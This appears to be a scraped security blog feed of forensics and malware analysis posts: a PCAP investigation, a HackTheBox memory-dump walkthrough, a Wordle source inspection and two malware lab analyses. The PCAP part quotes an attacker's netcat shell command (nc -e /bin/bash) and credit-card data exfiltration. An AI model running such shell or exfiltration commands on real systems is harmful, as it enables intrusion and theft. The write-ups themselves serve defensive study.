#DataNET in the title</li> <li>Packet 2434 <code>GET /evox/about</code> from 10.0.2.15 to 10.0.2.3 (Bad Request)</li> <li>Packet 2452 checks /HNAP again (a vulnerability that can allow RCE), but it returns 404<ul> <li>These last few packets appear to be NMAP doing a scan to check for vulnerabilities</li> </ul> </li> <li>Packet 2482, 2484: 10.0.2.15 tries to log in to telnet on 10.0.2.3 but fails</li> <li>Packet 2459-2514 are ICMP ping packets</li> <li>Packet 2518 a HTTP request coming from User-Agent curl/7.60.0</li> <li>Packet 2526, DNS request for <code>A acid</code> which returns <code>192.168.0.24</code></li> <li>Packets 2531 - 2539, user tries to login to Telnet as admin:admin and fails</li> <li>Packet 2545, another DNS request for <code>A acid</code> whcih returns <code>192.168.0.24</code></li> <li>Packets 2555-2559, user tries to login to Telnet as admin:admin and <strong>SUCCEEDS</strong>.</li> <li>Packet 2563-2579: Telnet command ran to view stock/inventory</li> <li>Packet 2578, user logs back into telnet and immediately runs the stock command again</li> </ul> <div class="highlight"><pre><span></span><code>Welcome,<span class="w"> </span>admin Here<span class="w"> </span>is<span class="w"> </span>you<span class="err">'</span>re<span class="w"> </span>daily<span class="w"> </span>stock<span class="w"> </span>report! PRODUCT<span class="w"> </span>PRICE<span class="w"> </span>STOCK SHIRTS<span class="w"> </span><span class="m">20</span>$<span class="w"> </span><span class="m">50</span> JEANS<span class="w"> </span><span class="m">40</span>$<span class="w"> </span><span class="m">99</span> WALLETS<span class="w"> </span><span class="m">15</span>$<span class="w"> </span><span class="m">19</span> SOCKS<span class="w"> </span><span class="m">10</span>$<span class="w"> </span><span class="m">100</span> Type<span class="w"> </span><span class="nb">exit</span><span class="w"> </span>to<span class="w"> </span><span class="nb">exit</span><span class="w"> </span>the<span class="w"> </span>program:<span class="w"> </span> </code></pre></div> <ul> <li>Packet 2631, Telnet command ran <code>nc.traditional -lvp 9999 -e /bin/bash</code></li> <li>Packet 2633, reverse shell started and activity begins contact 10.0.2.3:9999<ul> <li>This is tcp.stream eq 1056</li> </ul> </li> </ul> <p>From here, I followed the TCP stream and the attacker:</p> <ul> <li>Ran <code>ls -la</code> to find two files: costumers.sql and login.sh</li> <li>Ran <code>pwd</code> to find they were in <code>/var/www/html/MarketDump</code></li> <li>Ran <code>whoami</code> to find they were <code>**root**</code> (Oh man)</li> <li>Ran <code>wc -l costumers.ql</code> for the wordcount of 10302</li> <li>Copied the sql file to <code>/tmp</code> and exfiltrated it via a Python web server on port 9998</li> <li>Ran <code>cat costumers.sql</code> to get an output of Credit Card Numbers<ul> <li>One of the customers has a card number that contains letters instead of just numbers, this is our compromised customer</li> </ul> </li> <li>The user then removed the costumers.sql file from /tmp and ran <code>exit</code></li> </ul> <p>Through trial and error, I found the unusual string from the database was base58 encoded. Decoding it from an online web tool nets us the flag.</p>2022-02-24T19:56:55-05:002022-02-24T19:56:55-05:00Eric Turnertag:blog.ericturner.it,2022-02-24:/2022/02/24/hackthebox-forensics-challenge-reminiscent/

<p>Link: <a href="https://app.hackthebox.com/challenges/reminiscent">https://app.hackthebox.com/challenges/reminiscent</a></p> <p>Our unzipped folder gives us a <code>Resume.eml</code>, <code>imageinfo.txt</code> and <code>flounder-pc-memdump.elf</code> memory dump file.</p> <p>Let's check out the email message. I ran <code>cat Resume.eml</code> which nets us:</p> <div class="highlight"><pre><span></span><code><span class="k">Return</span><span class="o">-</span><span class="k">Path</span><span class="err">:</span><span class="w"> </span><span class="n">bloodworm</span><span class="nv">@madlab</span><span class="p">.</span><span class="n">lcl</span> <span class="w"> </span><span class="n">Delivered</span><span class="o">-</span><span class="k">To</span><span class="err">:</span><span class="w"> </span><span class="n">madlab</span><span class="p">.</span><span class="n">lcl</span><span class="o">-</span><span class="n">flounder</span><span class="nv">@madlab</span><span class="p">.</span><span class="n">lcl</span> <span class="w"> </span><span class="nl">Received …</span></code></pre></div>

<p>Link: <a href="https://app.hackthebox.com/challenges/reminiscent">https://app.hackthebox.com/challenges/reminiscent</a></p> <p>Our unzipped folder gives us a <code>Resume.eml</code>, <code>imageinfo.txt</code> and <code>flounder-pc-memdump.elf</code> memory dump file.</p> <p>Let's check out the email message. I ran <code>cat Resume.eml</code> which nets us:</p> <div class="highlight"><pre><span></span><code><span class="k">Return</span><span class="o">-</span><span class="k">Path</span><span class="err">:</span><span class="w"> </span><span class="n">bloodworm</span><span class="nv">@madlab</span><span class="p">.</span><span class="n">lcl</span> <span class="w"> </span><span class="n">Delivered</span><span class="o">-</span><span class="k">To</span><span class="err">:</span><span class="w"> </span><span class="n">madlab</span><span class="p">.</span><span class="n">lcl</span><span class="o">-</span><span class="n">flounder</span><span class="nv">@madlab</span><span class="p">.</span><span class="n">lcl</span> <span class="w"> </span><span class="nl">Received</span><span class="p">:</span><span class="w"> </span><span class="p">(</span><span class="n">qmail</span><span class="w"> </span><span class="mi">2609</span><span class="w"> </span><span class="n">invoked</span><span class="w"> </span><span class="k">by</span><span class="w"> </span><span class="n">uid</span><span class="w"> </span><span class="mi">105</span><span class="p">);</span><span class="w"> </span><span class="mi">3</span><span class="w"> </span><span class="n">Oct</span><span class="w"> </span><span class="mi">2017</span><span class="w"> </span><span class="mi">02</span><span class="err">:</span><span class="mi">30</span><span class="err">:</span><span class="mi">24</span><span class="w"> </span><span class="o">-</span><span class="mi">0000</span> <span class="w"> </span><span class="n">MIME</span><span class="o">-</span><span class="nl">Version</span><span class="p">:</span><span class="w"> </span><span class="mf">1.0</span> <span class="w"> </span><span class="n">Content</span><span class="o">-</span><span class="nl">Type</span><span class="p">:</span><span class="w"> </span><span class="n">multipart</span><span class="o">/</span><span class="n">alternative</span><span class="p">;</span> <span class="w"> </span><span class="n">boundary</span><span class="o">=</span><span class="ss">"=_a8ebc8b42c157d88c1096632aeae0559"</span> <span class="w"> </span><span class="nc">Date</span><span class="err">:</span><span class="w"> </span><span class="n">Mon</span><span class="p">,</span><span class="w"> </span><span class="mi">02</span><span class="w"> </span><span class="n">Oct</span><span class="w"> </span><span class="mi">2017</span><span class="w"> </span><span class="mi">22</span><span class="err">:</span><span class="mi">30</span><span class="err">:</span><span class="mi">24</span><span class="w"> </span><span class="o">-</span><span class="mi">0400</span> <span class="w"> </span><span class="k">From</span><span class="err">:</span><span class="w"> </span><span class="n">Brian</span><span class="w"> </span><span class="n">Loodworm</span><span class="w"> </span><span class="n">bloodworm</span><span class="nv">@madlab</span><span class="p">.</span><span class="n">lcl</span> <span class="w"> </span><span class="k">To</span><span class="err">:</span><span class="w"> </span><span class="n">flounder</span><span class="nv">@madlab</span><span class="p">.</span><span class="n">lcl</span> <span class="w"> </span><span class="nl">Subject</span><span class="p">:</span><span class="w"> </span><span class="n">Resume</span> <span class="w"> </span><span class="nl">Organization</span><span class="p">:</span><span class="w"> </span><span class="n">HackTheBox</span> <span class="w"> </span><span class="n">Message</span><span class="o">-</span><span class="nl">ID</span><span class="p">:</span><span class="w"> </span><span class="n">add77ed2ac38c3ab639246956c25b2c2</span><span class="nv">@madlab</span><span class="p">.</span><span class="n">lcl</span> <span class="w"> </span><span class="n">X</span><span class="o">-</span><span class="nl">Sender</span><span class="p">:</span><span class="w"> </span><span class="n">bloodworm</span><span class="nv">@madlab</span><span class="p">.</span><span class="n">lcl</span> <span class="w"> </span><span class="nl">Received</span><span class="p">:</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">mail</span><span class="p">.</span><span class="n">madlab</span><span class="p">.</span><span class="n">lcl</span><span class="w"> </span><span class="p">(</span><span class="n">HELO</span><span class="w"> </span><span class="n">mail</span><span class="p">.</span><span class="n">madlab</span><span class="p">.</span><span class="n">lcl</span><span class="p">)</span><span class="w"> </span><span class="p">(</span><span class="mf">127.0.0.1</span><span class="p">)</span> <span class="w"> </span><span class="k">by</span><span class="w"> </span><span class="n">mail</span><span class="p">.</span><span class="n">madlab</span><span class="p">.</span><span class="n">lcl</span><span class="w"> </span><span class="p">(</span><span class="n">qpsmtpd</span><span class="o">/</span><span class="mf">0.96</span><span class="p">)</span><span class="w"> </span><span class="k">with</span><span class="w"> </span><span class="n">ESMTPSA</span><span class="w"> </span><span class="p">(</span><span class="n">ECDHE</span><span class="o">-</span><span class="n">RSA</span><span class="o">-</span><span class="n">AES256</span><span class="o">-</span><span class="n">GCM</span><span class="o">-</span><span class="n">SHA384</span><span class="w"> </span><span class="n">encrypted</span><span class="p">);</span><span class="w"> </span><span class="n">Mon</span><span class="p">,</span><span class="w"> </span><span class="mi">02</span><span class="w"> </span><span class="n">Oct</span><span class="w"> </span><span class="mi">2017</span><span class="w"> </span><span class="mi">22</span><span class="err">:</span><span class="mi">30</span><span class="err">:</span><span class="mi">24</span><span class="w"> </span><span class="o">-</span><span class="mi">0400</span> <span class="w"> </span><span class="c1">--=_a8ebc8b42c157d88c1096632aeae0559</span> <span class="w"> </span><span class="n">Content</span><span class="o">-</span><span class="n">Transfer</span><span class="o">-</span><span class="nl">Encoding</span><span class="p">:</span><span class="w"> </span><span class="mi">7</span><span class="nc">bit</span> <span class="w"> </span><span class="n">Content</span><span class="o">-</span><span class="nl">Type</span><span class="p">:</span><span class="w"> </span><span class="nc">text</span><span class="o">/</span><span class="n">plain</span><span class="p">;</span><span class="w"> </span><span class="n">charset</span><span class="o">=</span><span class="n">US</span><span class="o">-</span><span class="nf">ASCII</span> <span class="w"> </span><span class="n">Hi</span><span class="w"> </span><span class="n">Frank</span><span class="p">,</span><span class="w"> </span><span class="n">someone</span><span class="w"> </span><span class="n">told</span><span class="w"> </span><span class="n">me</span><span class="w"> </span><span class="n">you</span><span class="w"> </span><span class="n">would</span><span class="w"> </span><span class="n">be</span><span class="w"> </span><span class="n">great</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="n">review</span><span class="w"> </span><span class="n">my</span><span class="w"> </span><span class="n">resume</span><span class="p">..</span> <span class="w"> </span><span class="n">Could</span><span class="w"> </span><span class="n">you</span><span class="w"> </span><span class="n">have</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">look</span><span class="vm">?</span> <span class="w"> </span><span class="n">resume</span><span class="p">.</span><span class="n">zip</span><span class="w"> </span><span class="o">[</span><span class="n">1</span><span class="o">]</span> <span class="w"> </span><span class="nl">Links</span><span class="p">:</span> <span class="w"> </span><span class="o">[</span><span class="n">1</span><span class="o">]</span><span class="w"> </span><span class="nl">http</span><span class="p">:</span><span class="o">//</span><span class="mf">10.10.99.55</span><span class="err">:</span><span class="mi">8080</span><span class="o">/</span><span class="n">resume</span><span class="p">.</span><span class="n">zip</span> </code></pre></div> <p>We can see a link to a zip file on a remote server from the email. It is named <code>resume</code> but the extension is a <code>.zip</code> instead of a <code>.docx</code> or <code>.pdf</code> which should have been the first indicator to leave the attachment alone.</p> <p>Next inside our package was an <code>imageinfo.txt</code> that provides information on the <code>flounder-pc-memdump.elf</code> memory file:</p> <div class="highlight"><pre><span></span><code><span class="w"> </span>Suggested<span class="w"> </span>Profile<span class="o">(</span>s<span class="o">)</span><span class="w"> </span>:<span class="w"> </span>Win7SP1x64,<span class="w"> </span>Win7SP0x64,<span class="w"> </span>Win2008R2SP0x64,<span class="w"> </span>Win2008R2SP1x64_23418,<span class="w"> </span>Win2008R2SP1x64,<span class="w"> </span>Win7SP1x64_23418 <span class="w"> </span>AS<span class="w"> </span>Layer1<span class="w"> </span>:<span class="w"> </span>WindowsAMD64PagedMemory<span class="w"> </span><span class="o">(</span>Kernel<span class="w"> </span>AS<span class="o">)</span> <span class="w"> </span>AS<span class="w"> </span>Layer2<span class="w"> </span>:<span class="w"> </span>VirtualBoxCoreDumpElf64<span class="w"> </span><span class="o">(</span>Unnamed<span class="w"> </span>AS<span class="o">)</span> <span class="w"> </span>AS<span class="w"> </span>Layer3<span class="w"> </span>:<span class="w"> </span>FileAddressSpace<span class="w"> </span><span class="o">(</span>/home/infosec/dumps/mem_dumps/01/flounder-pc-memdump.elf<span class="o">)</span> <span class="w"> </span>PAE<span class="w"> </span><span class="nb">type</span><span class="w"> </span>:<span class="w"> </span>No<span class="w"> </span>PAE <span class="w"> </span>DTB<span class="w"> </span>:<span class="w"> </span>0x187000L <span class="w"> </span>KDBG<span class="w"> </span>:<span class="w"> </span>0xf800027fe0a0L <span class="w"> </span>Number<span class="w"> </span>of<span class="w"> </span>Processors<span class="w"> </span>:<span class="w"> </span><span class="m">2</span> <span class="w"> </span>Image<span class="w"> </span>Type<span class="w"> </span><span class="o">(</span>Service<span class="w"> </span>Pack<span class="o">)</span><span class="w"> </span>:<span class="w"> </span><span class="m">1</span> <span class="w"> </span>KPCR<span class="w"> </span><span class="k">for</span><span class="w"> </span>CPU<span class="w"> </span><span class="m">0</span><span class="w"> </span>:<span class="w"> </span>0xfffff800027ffd00L <span class="w"> </span>KPCR<span class="w"> </span><span class="k">for</span><span class="w"> </span>CPU<span class="w"> </span><span class="m">1</span><span class="w"> </span>:<span class="w"> </span>0xfffff880009eb000L <span class="w"> </span>KUSER_SHARED_DATA<span class="w"> </span>:<span class="w"> </span>0xfffff78000000000L <span class="w"> </span>Image<span class="w"> </span>date<span class="w"> </span>and<span class="w"> </span><span class="nb">time</span><span class="w"> </span>:<span class="w"> </span><span class="m">2017</span>-10-04<span class="w"> </span><span class="m">18</span>:07:30<span class="w"> </span>UTC+0000 <span class="w"> </span>Image<span class="w"> </span><span class="nb">local</span><span class="w"> </span>date<span class="w"> </span>and<span class="w"> </span><span class="nb">time</span><span class="w"> </span>:<span class="w"> </span><span class="m">2017</span>-10-04<span class="w"> </span><span class="m">11</span>:07:30<span class="w"> </span>-0700 </code></pre></div> <p>We can use the Volatility framework to investigate this file.</p> <div class="highlight"><pre><span></span><code><span class="c1"># view running processes</span> $<span class="w"> </span>vol.py<span class="w"> </span>pslist<span class="w"> </span>--profile<span class="o">=</span>Win7SP1x64<span class="w"> </span>-f<span class="w"> </span>flounder-pc-memdump.elf </code></pre></div> <p>We see two powershell.exe processes running from the above command. One at 496 and one at 2752.</p> <div class="highlight"><pre><span></span><code><span class="c1"># scan the active network connections</span> $<span class="w"> </span>vol.py<span class="w"> </span>netscan<span class="w"> </span>--profile<span class="o">=</span>Win7SP1x64<span class="w"> </span>-f<span class="w"> </span>flounder-pc-memdump.elf ... 0x1fc04010<span class="w"> </span>TCPv6<span class="w"> </span>-:0<span class="w"> </span><span class="m">6890</span>:8300:80fa:ffff:6890:8300:80fa:ffff:0<span class="w"> </span>CLOSED<span class="w"> </span><span class="m">2752</span><span class="w"> </span>powershell.exe 0x1fc04490<span class="w"> </span>TCPv4<span class="w"> </span><span class="m">10</span>.10.100.43:49246<span class="w"> </span><span class="m">10</span>.10.99.55:80<span class="w"> </span>CLOSED<span class="w"> </span><span class="m">2752</span><span class="w"> </span>powershell.exe 0x1fc15010<span class="w"> </span>TCPv6<span class="w"> </span>::1:2869<span class="w"> </span>::1:49237<span class="w"> </span>ESTABLISHED<span class="w"> </span><span class="m">4</span><span class="w"> </span>System 0x1fc3d320<span class="w"> </span>TCPv4<span class="w"> </span><span class="m">10</span>.10.100.43:49247<span class="w"> </span><span class="m">10</span>.10.99.55:80<span class="w"> </span>CLOSED<span class="w"> </span><span class="m">2752</span><span class="w"> </span>powershell.exe </code></pre></div> <p>We can see a few closed connections to the same IP that the file was downloaded from on the PID 2752, powershell.exe process.</p> <div class="highlight"><pre><span></span><code><span class="c1"># search for resume files open</span> $<span class="w"> </span>vol.py<span class="w"> </span>filescan<span class="w"> </span>--profile<span class="o">=</span>Win7SP1x64<span class="w"> </span>-f<span class="w"> </span>flounder-pc-memdump.elf<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>resume Volatility<span class="w"> </span>Foundation<span class="w"> </span>Volatility<span class="w"> </span>Framework<span class="w"> </span><span class="m">2</span>.6.1 0x000000001e1f6200<span class="w"> </span><span class="m">1</span><span class="w"> </span><span class="m">0</span><span class="w"> </span>R--r--<span class="w"> </span><span class="se">\D</span>evice<span class="se">\H</span>arddiskVolume2<span class="se">\U</span>sers<span class="se">\u</span>ser<span class="se">\D</span>esktop<span class="se">\r</span>esume.pdf.lnk 0x000000001e8feb70<span class="w"> </span><span class="m">1</span><span class="w"> </span><span class="m">1</span><span class="w"> </span>R--rw-<span class="w"> </span><span class="se">\D</span>evice<span class="se">\H</span>arddiskVolume2<span class="se">\U</span>sers<span class="se">\u</span>ser<span class="se">\D</span>esktop<span class="se">\r</span>esume.pdf.lnk </code></pre></div> <p>We do have two files open, lets dump the files and see what we can derive from them:</p> <div class="highlight"><pre><span></span><code><span class="c1"># dump files at the specified offset to the current directory</span> $<span class="w"> </span>vol.py<span class="w"> </span>dumpfiles<span class="w"> </span>--profile<span class="o">=</span>Win7SP1x64<span class="w"> </span>-f<span class="w"> </span>flounder-pc-memdump.elf<span class="w"> </span>-Q<span class="w"> </span>0x000000001e8feb70<span class="w"> </span>-D<span class="w"> </span>. </code></pre></div> <p>We can use <code>strings</code> on the files and a bunch of base64 appears. I threw the output into cyberchef and it returns a command with period delimitation and another base64 string:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/02/image.webp"/></p> <p>from base64</p> <p>After a quick google search, the period can be a sign of UTF-16(LE) encoding, according to <a href="https://stackoverflow.com/questions/27929032/why-is-unicode-stored-with-periods-in-between-characters">this StackOverflow post</a>. So, if we pass this through a Decode Text - UTF-16LE (1200) module, it removes the periods and we can copy the new base64 string and paste it.</p> <p>After decoding the new string, we see the actual powershell code. Down near the very bottom is a $flag variable with our flag.</p>2022-01-31T15:20:01-05:002022-01-31T15:20:01-05:00Eric Turnertag:blog.ericturner.it,2022-01-31:/2022/01/31/wordle-reversed/

<p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-30.webp"/></p> <p>Wordle Share Grid</p> <p>I've been seeing posts for this wordle game on my facebook, and it seems to be alight on Twitter as well. I decided to try the game today and was able to get it on my fourth try! It was pretty fun. But, I wanted to see …</p>

<p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-30.webp"/></p> <p>Wordle Share Grid</p> <p>I've been seeing posts for this wordle game on my facebook, and it seems to be alight on Twitter as well. I decided to try the game today and was able to get it on my fourth try! It was pretty fun. But, I wanted to see if there was an easier way to determine the word just for fun.</p> <p>Inspecting the network requests when entering a guess showed no activity. Which means the correct word must be already cached locally and isn't hitting a server for validation.</p> <p>Doing some source code viewing, there is a word hash at the top along with the main.js:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-31.webp"/></p> <p>Source Code</p> <p>Browsing the sourcecode, there are several thousand lines of code. Most importantly are two arrays <code>La</code>, and <code>Ta</code>. <code>Ta</code> appears to be all the valid words in alphabetical order. <code>La</code> appears to be all words in game order.</p> <p>Wordle chooses a new word every day, the offset is based off of its date of creation, June 19, 2021. On mine above you can see 226. There are 2315 words available which is enough to go through 2027.</p> <p>If you copy the full <code>La</code> array to the console and access the 226th item, you get today's answer:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-32.webp"/></p> <p>Answers for today and tomorrow</p> <p>I manually set my date time to tomorrow on my linux VM and tested 227s word and sure enough it confirmed that <code>var La</code> is the answers for each day:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-33.webp"/></p> <p>neat</p> <p>And now my share screen is the following for tomorrow: </p> <p>Wordle 227 1/6</p> <p>🟩🟩🟩🟩🟩</p> <p>It's a simple game that is fun for many online, and I was definitely surprised all of the answers were stored plain text in an array like that. Very interesting!</p>2022-01-12T20:27:12-05:002022-01-12T20:27:12-05:00Eric Turnertag:blog.ericturner.it,2022-01-12:/2022/01/12/malware-analysis-2/

<p>SHA256 Hash: 1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c</p> <p>I searched the daily list of MalShare.com and pulled a random hash for investigation today, downloaded through my REMnux box and then used a Python web server to pull it onto my Windows box, since my windows vm has no internet connection.</p> <h1 id="static-analysis">Static Analysis</h1> <p>I renamed …</p>

<p>SHA256 Hash: 1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c</p> <p>I searched the daily list of MalShare.com and pulled a random hash for investigation today, downloaded through my REMnux box and then used a Python web server to pull it onto my Windows box, since my windows vm has no internet connection.</p> <h1 id="static-analysis">Static Analysis</h1> <p>I renamed the file (which was just named after the sha256 hash) to m2.exe. I imported this into peID and received a <code>Nothing Found *</code> message which indicates it could be obfuscated.</p> <p>Next I imported this into peStudio, and one of the IOCs it is highlighting is the use of the winhttp.dll library along with function calls over HTTP.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-20.webp"/></p> <p>This screenshot shows some functions including ShellExecute and WinHTTP calls for opening and sending web requests</p> <p>Further metadata about the file reveals the file is trying to mask itself as being from the Intel Corporation:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-21.webp"/></p> <p>Version Information</p> <p>My current suspicion is that this is a trojan dropper. It has some code already like in our Malware Analysis #1, and will try to make a call home to fetch further code that can be executed by the ShellExecute. Once again, all traffic is routed through my REMnux box so it will never actually be able to call home.</p> <p>I tried loading the file into dotPeek but it is unable to do anything with it.</p> <h1 id="dynamic-analysis">Dynamic Analysis</h1> <p>I have my REMnux box fired up and ready to monitor calls. On windows I fired up procmon and ProcessHacker. I also used Regshot to take a before capture of our registry.</p> <p>After running it, it took over a minute before I noticed any activity. Eventually a new folder named PS_Transcripts appeared on the desktop and inside was a file with this in it:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-22.webp"/></p> <p>It copied the original file to C:\ProgramData\SystemData\igfxCUIService.exe, so it is trying to pretend to be an actual Intel executable. It then spawns a new Process from this new file named igfxCUIService.exe, instead of my original m2.exe. Periodically I will see a sub-process for Powershell or CMD execute in Process Hacker that turns red for about 5 seconds then disappears:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-23.webp"/></p> <p>A subprocess it spawns</p> <p>In the new SystemData folder, there is a new file named microsoft_Windows.dll that is only 1 kb. I've noticed some TLS calls in wireshark to drive.google.com. I cannot prove at this time it's this process calling it, but I have nothing else on the computer that would need to make a connection to Google Drive.</p> <p>Every two minutes or so a new file has dropped in the PS_Transcripts folder. It seems to be trying to exfiltrate data about my machine such as wmic data and environment variables to temp files. I'm watching the SystemData folder in an open Explorer and they never seem to actually appear. My guess is they maybe drop there for a second, try to exfiltrate then are deleted.</p> <p>It's been probably 10 minutes. I decided to kill the process in Process Hacker and I waited another minute just to see if it would try to auto-launch itself back up or not. So far it appears it is down. The calls to drive.google.com have stopped since killing the application as well.</p> <p>I sent my wireshark PCAP file over to the windows box along with the procmon file (be sure to change some of the settings before exporting to csv. See the README.md for procmon for more info).</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-25.webp"/></p> <p>Oh boy</p> <h2 id="overview">Overview</h2> <ul> <li>m2.exe creates new thread (2376) and writes data to file in C:\Windows\rescache<ul> <li>Like in Malware Analysis #1, this thread sets a bunch of registry keys in \HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap relating to internet options</li> <li>It sets an autostart registry key to powershell.exe</li> </ul> </li> <li>Several Powershell.exe threads appear running different things<ul> <li>One creates a powershell script file in the %TEMP% folder</li> <li>Another creates the first logfile I saw and then sets the Internet Settings keys again in the registry before cloning itself to igfxCUIservice.exe, which we also saw.</li> </ul> </li> <li>The igfxCUIService.exe just continually creates new powershell scripts, spawns powershell, runs the script, deletes the script and usually dumps some sort of temp file in the SystemData folder which then also gets deleted shortly after.</li> <li>It does create the microsoft_Windows.dll file as well</li> <li>It finally spawns a cmd.exe that creates an autostart registry key for igxCUIService.exe</li> <li>Interestingly, it tries sending traffic to win1710.ipv6.microsoft.com:443</li> <li>svchost.exe does a bunch of queries on stuff related to the original m2.exe file</li> <li>System.exe is also shown sending data to the same microsoft address.</li> </ul> <h1 id="internet-search_1">Internet Search</h1> <p>I finally decided to search the hash here on VirusTotal, and found the community is referring to this as SysJoker. One step I missed was monitoring the memory. The application was writing those temp files then storing the contents in memory, that's why it was able to write, read and delete them.</p> <p>Also inside the binary was a hardcoded XOR key which would have allowed me to decode the exact endpoint it was trying to reach. It was in fact trying to reach google drive in order to download a file that contained the IP of the C2 server. It was also programmed to randomly wait between 90-120 seconds before doing it's next command, which I noticed with the log files being spaced out.</p> <p>Since I had my internet proxied so it could not have actually reached its endpoint, I found a fantastic article that shows further steps along with the XOR key and more <a href="https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/">here</a>.</p> <p>When they performed the analysis, it seemed the malware was lying dormant and was not actually issued any commands from the C2 server to actually activate. The server had the ability to receive a callback to see if the executed commands were successful or not. This malware also works on linux and MacOS, where it is virtually undetectable by Virus Scanners.</p> <h1 id="further-analysis">Further Analysis</h1> <p>After browsing through that link, I opened the igfxCUIService.exe file with CFF Explorer and found the XOR key and path:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-26.webp"/></p> <p>Code</p> <p>To get the code over to my linux box to decode, I outputted the ascii to text and then used the following command:</p> <div class="highlight"><pre><span></span><code>pscp<span class="w"> </span>C:<span class="se">\P</span>rogramData<span class="se">\S</span>ystemData<span class="se">\x</span>or.txt<span class="w"> </span>remnux@10.10.2.2:/home/remnux/Downloads/xor.txt </code></pre></div> <p>I did this for both files, then booted up CyberChef to perform the operation:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-27.webp"/></p> <p>Decoded!</p> <p>The string was originally base64 (notice the == at the end is usually a giveaway). By decoding this first, then performing the XOR operation with the key, it reveals the google drive link!</p> <p>Downloading the file through curl, I received another base64 string that I popped into CyberChef and got the following JSON:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-28.webp"/></p> <p>Our C2 domain</p> <p>The domain is registered, however I receive a 500 error for GET or POST requests.</p> <p>If we try a PUT request, we get a Laravel error message:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-29.webp"/></p> <p>Laravel error, 405 Method Not Allowed</p> <p>So know we know this C2 server is running Laravel PHP to listen for requests.</p> <p>I tried sending some sort of POST with JSON of fake mac address, IP, av, and os to see if it would respond but it still hangs on a 500 error so there appears to be a misconfiguration and it isn't going to respond at all.</p> <h1 id="conclusion">Conclusion</h1> <p>I've done more research into volatility and dumping memory from VirtualBox, i will try to implement that in a future malware analysis. I also need to figure out if I can allow certain domains as a pass-thru in my linux box. That way, in this case, the malware could reach drive.google.com but then not be able to actually proceed and contact the C2 server.</p>2022-01-11T16:04:25-05:002022-01-11T16:04:25-05:00Eric Turnertag:blog.ericturner.it,2022-01-11:/2022/01/11/malware-analysis-1/

<p>See <a href="https://blog.ericturner.local/2022/01/10/malware-analysis-lab/">here</a> on my post on creating your own Malware Analysis lab!</p> <p>I created an account on <a href="https://virusshare.com/">VirusShare</a> to download some malware samples. I downloaded the first one so let's dive in and see what we can discover!</p> <p>The SHA256 for my download was: <code>2db4caf14befbe99a9cf51ed7f7c3cade9df666c45579baaffc9e5a53c0b773c</code>.</p> <ul> <li>I downloaded the zip and …</li></ul>

<p>See <a href="https://blog.ericturner.local/2022/01/10/malware-analysis-lab/">here</a> on my post on creating your own Malware Analysis lab!</p> <p>I created an account on <a href="https://virusshare.com/">VirusShare</a> to download some malware samples. I downloaded the first one so let's dive in and see what we can discover!</p> <p>The SHA256 for my download was: <code>2db4caf14befbe99a9cf51ed7f7c3cade9df666c45579baaffc9e5a53c0b773c</code>.</p> <ul> <li>I downloaded the zip and compared the sha256 hash once downloaded to confirm it matches.</li> <li>Next, I booted up a python webserver to transfer this over to my Windows testing machine.</li> <li>Unzip the zip file and I renamed the file to <code>hmm.exe</code></li> <li>Start up a procmon on my local windows machine and Wireshark on my REMnux box. I already have the networking configured for DNS and returning web services (see my blog post in the link at the top of this one for more info)</li> </ul> <h1 id="static-analysis">Static Analysis</h1> <p>Before I go all willy-nilly and just boot the executable up, let's see what we can determine from it statically. I opened the file with <code>pestudio</code>. The initial indicators tab throws up some immediate flags:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-13.webp"/></p> <p>indicators tab</p> <p>Looking in the strings column, we can see several long base64 encoded strings to avoid detection.</p> <p>Next I analyzed the file with peID to determine how the file was packed / compiled and saw the following:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-14.webp"/></p> <p>Basic .NET 32-bit application</p> <p>With this in mind, I booted up dotPeek by JetBrains and navigated to the Root Namespace we have for C# source code files that are randomly named and the functions / strings inside these files are also obfuscated:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-15.webp"/></p> <p>odd naming convention for files</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-16.webp"/></p> <p>Snippet of one of the files, note many of the variables have random strings.</p> <p>Inside of zcom.Resources, there are two base64 strings. The first one appears to be more source code. The second one returned random chinese characters so it wasn't useful to read but I am sure it gets shuffled around with the code in order to become legible again:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-17.webp"/></p> <h1 id="dynamic-analysis">Dynamic Analysis</h1> <p>Let's go ahead and run this file and see what it does. I have a clean Wireshark open on my REMnux box, and procmon and ProcessHacker open on the Windows box.</p> <p>Immediately upon launching, we get a new tmp8CA2.tmp.exe launch in Process Hacker. This is located in <code>%TEMP%</code> and has a date modified of 2/16/2007 12:00 AM. I also noticed another System.Web.exe in this folder with the same date and time, so it could be a clone.</p> <p>My DNS server captures a few DNS records as well:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-18.webp"/></p> <p>DNS records</p> <p>Wireshark has lit up, this process is sending tons of packets. One of which, is trying to get an <code>IP.php</code> from one of the urls we saw:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-19.webp"/></p> <p>Web Request</p> <p>It seems to have hung on this point, continually 